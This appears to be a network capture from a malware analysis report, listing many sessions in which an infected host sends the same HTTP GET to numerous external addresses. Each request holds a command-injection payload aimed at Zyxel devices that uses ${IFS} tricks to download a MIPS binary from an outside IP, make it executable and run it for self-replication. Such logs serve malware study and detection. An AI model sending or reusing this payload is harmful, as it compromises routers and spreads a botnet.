                                                Jan 12, 2024 18:24:39.970017910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5545192.168.2.135872852.139.248.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.970053911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5546192.168.2.133955250.67.47.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.970144987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5547192.168.2.1343822199.87.113.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.970165968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5548192.168.2.1340028206.144.248.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.970247984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5549192.168.2.1332812154.183.84.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.970303059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5550192.168.2.135997249.117.222.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.970326900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5551192.168.2.134048476.153.210.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.970391989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5552192.168.2.1346332168.36.131.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.970432043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5553192.168.2.135271293.71.73.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.970484018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5554192.168.2.1345204184.148.199.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.970541000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5555192.168.2.1351058176.201.11.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.970609903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5556192.168.2.1351546160.139.29.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.970657110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5557192.168.2.133785864.179.136.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.970726013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5558192.168.2.133931669.3.135.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.970782995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5559192.168.2.133354045.111.213.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.970819950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5560192.168.2.1343158150.83.216.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.970915079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5561192.168.2.1344248161.237.155.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.970966101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5562192.168.2.1357066218.148.226.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.971028090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5563192.168.2.1354288157.156.138.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.971115112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5564192.168.2.135906093.228.55.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.971163034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5565192.168.2.1349480143.121.74.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.971227884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5566192.168.2.135312480.69.2.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.971276999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5567192.168.2.1335292171.113.133.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.971333027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5568192.168.2.1336354207.109.61.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.971378088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5569192.168.2.134046873.229.253.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.971425056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5570192.168.2.1348404173.81.179.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.971492052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5571192.168.2.13389104.87.113.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.971543074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5572192.168.2.1360254207.26.18.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.971581936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5573192.168.2.134566669.30.209.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.971653938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5574192.168.2.135103870.82.65.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.971684933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5575192.168.2.133474818.176.10.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.971754074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5576192.168.2.1347940107.35.179.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.987256050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5577192.168.2.135947252.41.203.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.987473011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5578192.168.2.1345552171.177.46.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.987528086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5579192.168.2.1347738196.132.11.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.987584114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5580192.168.2.1348806157.105.34.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.987634897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5581192.168.2.1349398189.108.45.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.987674952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5582192.168.2.1355482161.111.183.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.987705946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5583192.168.2.133693647.135.170.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.987790108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5584192.168.2.134649254.112.192.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.987826109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5585192.168.2.1353694175.238.215.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.987880945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5586192.168.2.133941653.228.22.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.987936974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5587192.168.2.135199227.178.43.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.987984896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5588192.168.2.1344154143.68.230.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.988064051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5589192.168.2.133615676.41.165.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.988116026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5590192.168.2.134238020.242.207.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.988163948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5591192.168.2.1357152184.83.247.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.988188028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5592192.168.2.1354226102.243.146.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.988276958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5593192.168.2.133756019.247.101.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.988293886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5594192.168.2.1345590145.60.192.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.988373041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5595192.168.2.1358644167.134.229.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.988404989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5596192.168.2.1356890128.162.59.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.988449097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5597192.168.2.1357558179.242.155.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.988509893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5598192.168.2.1340678135.102.176.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.988560915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5599192.168.2.1350052218.225.246.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.988610029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5600192.168.2.1348206168.59.119.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.988662958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5601192.168.2.1336400125.32.52.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.988718987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5602192.168.2.134729017.230.246.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.988742113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5603192.168.2.1335584206.132.225.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.988805056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5604192.168.2.136018844.190.131.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.988840103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5605192.168.2.1338626209.55.107.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.988897085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5606192.168.2.13350522.78.182.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.988948107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5607192.168.2.1336312137.24.194.159443
                                                TimestampBytes transferredDirectionData
